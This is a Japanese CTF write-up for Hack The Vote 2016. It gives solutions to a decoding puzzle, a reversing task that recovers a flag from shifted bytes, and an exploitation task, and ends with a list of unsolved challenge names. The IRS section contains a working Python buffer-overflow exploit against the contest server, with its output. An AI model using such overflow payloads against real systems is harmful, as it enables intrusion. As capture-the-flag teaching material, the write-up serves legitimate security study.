Hack The Vote 2016 供養(Writeup)
Hack The Vote 2016に参加。251ptで244位。
Sanity (Vote 1)
The flag is flag{th3r3_1s_0nly_on3_ch0ic3}
TOPKEK (Crypto 50)
$ cat kek.43319559636b94db1c945834340b65d68f90b6ecbb70925f7b24f6efc5c2524e.txt KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP!! KEK!!! TOP!! KEK!!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP!!!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!!!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK!!!!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP! KEK!! TOP! KEK!!!! TOP!!! KEK! TOP! KEK!!! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP!!! KEK!!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK!! TOP! KEK!!! TOP!! KEK!! TOP!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!!!! KEK!! TOP! KEK!! TOP!! KEK!!!!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP!!! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK! TOP!!!!! KEK! TOP!
data = open('kek.43319559636b94db1c945834340b65d68f90b6ecbb70925f7b24f6efc5c2524e.txt').read() s = '' for word in data.split(): if 'KEK' in word: c = '0' else: c = '1' s += c * (len(word)-3) s = "%x" % int(s, 2) print s.decode('hex')
Consul (Reversing 100)
.text:0000000000400A09 public c8 .text:0000000000400A09 c8 proc near .text:0000000000400A09 push rbp .text:0000000000400A0A mov rbp, rsp .text:0000000000400A0D mov eax, cs:mem .text:0000000000400A13 add eax, 9 .text:0000000000400A16 mov cs:mem, eax .text:0000000000400A1C mov edi, offset b .text:0000000000400A21 call add_mem .text:0000000000400A26 mov rsi, rax .text:0000000000400A29 mov edi, offset format ; "%s\r\n" .text:0000000000400A2E mov eax, 0 .text:0000000000400A33 call _printf .text:0000000000400A38 pop rbp .text:0000000000400A39 retn .text:0000000000400A39 c8 endp
0000000000601280 26 2C 21 27 3B 37 32 29 34 25 1F 29 2E 1F 22 25 &,!';72)4%.).."% 0000000000601290 32 2E 29 25 E1 3D 00 00 00 00 00 00 00 00 00 00 2.)%.=..........
26 2C 21 27
が66 6C 61 67 (flag)
$ python Python 2.7.12 (default, Jul 1 2016, 15:12:24) [GCC 5.4.0 20160609] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> x = """26 2C 21 27 3B 37 32 29 34 25 1F 29 2E 1F 22 25 ... 32 2E 29 25 E1 3D""" >>> x = x.replace('\n', '').replace(' ', '').decode('hex') >>> ''.join(chr((ord(c)+0x40) % 0x100) for c in x) 'flag{write_in_bernie!}'
IRS (Exploitation 100)
.text:080488FD 68 BE 92 04 08 push offset aYN ; "y/n\r" .text:08048902 E8 F1 FB FF FF call puts .text:08048907 83 C4 10 add esp, 10h .text:0804890A 83 EC 0C sub esp, 0Ch .text:0804890D 8D 45 EB lea eax, [ebp+s] .text:08048910 50 push eax ; s .text:08048911 E8 C2 FB FF FF call gets
Hint: not_the_flag will actually be the flag on the server
from minipwn import * def menu_file(s, name, password, income, deductible): print s.recv(8192) sendline(s, '1') print recvuntil(s, ': ') sendline(s, name) print recvuntil(s, ': ') sendline(s, password) print recvuntil(s, ': ') sendline(s, str(income)) print recvuntil(s, ': ') sendline(s, str(deductible)) print recvuntil(s, '!\r\n') def menu_edit(s, name, password, income, deductible, yorn): print s.recv(8192) sendline(s, '3') print recvuntil(s, ': ') sendline(s, name) print recvuntil(s, ': ') sendline(s, password) print recvuntil(s, ': ') sendline(s, str(income)) print recvuntil(s, ': ') sendline(s, str(deductible)) print recvuntil(s, 'y/n\r\n') sendline(s, yorn) print recvuntil(s, '!\r\n') #s = connect_process(['./irs.4ded467171bb532f7dba8e8fe42a1fc121aa1498a3f1748064755e2566593360']) s = socket.create_connection(('irs.pwn.republican', 4127)) raw_input() menu_file(s, 'AAAA', 'BBBB', 100, 100) plt_puts = 0x80484F8 addr_text = 0x8048AC2 buf = 'A' * 25 buf += p32(plt_puts) + 'AAAA' + p32(addr_text) menu_edit(s, 'AAAA', 'BBBB', 100, 100, buf) data = s.recv(8192) print "%r" % data
$ python test.py Welcome to the IRS! How may we serve you today? 1. File a tax return 2. Delete a tax return 3. Edit a tax return 4. View a tax return 5. Exit Tax returns on file: 0 - Donald Trump Enter the name: Enter the password: Enter the income: Enter the deductions: Thank you for doing your civic duty AAAA! Welcome to the IRS! How may we serve you today? 1. File a tax return 2. Delete a tax return 3. Edit a tax return 4. View a tax return 5. Exit Tax returns on file: 0 - Donald Trump 1 - AAAA Enter the name of the file to edit: Enter the password: Enter the new income: Enter the new deductible: Is this correct? Income: 100 Deductible: 100 y/n Your changes have been recorded! 'flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN\x8bE\xf0\x89E\xd0\x83\xec\x0c\x8dE\xd0P\xe8,\xfb\xff\xff\x83\xc4\x10\xa1 \xb0\x04\x08\x83\xec\x04Pj\x03\x8dE\xe5P\xe8\xc2\xf9\xff\xff\x83\xc4\x10\x83\xec\x04j2j\n' $ echo -en 'flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN\x8bE\xf0\x89E\xd0\x83\xec\x0c\x8dE\xd0P\xe8,\xfb\xff\xff\x83\xc4\x10\xa1 \xb0\x04\x08\x83\xec\x04Pj\x03\x8dE\xe5P\xe8\xc2\xf9\xff\xff\x83\xc4\x10\x83\xec\x04j2j\n' | strings | tr -d '\n' flag{c4n_1_g3t_a_r3fund}
- Sanders Fan Club (Web 100)
- Voter Registration (Web 200)
- FOX Voting Simulator (Exploitation 300)
- Warp Speed (Forensics 150)
- More Suspicious Traffic (Forensics 300)
- Vermatrix Supreme (Crypto 100)
- The Best RSA (Crypto 250)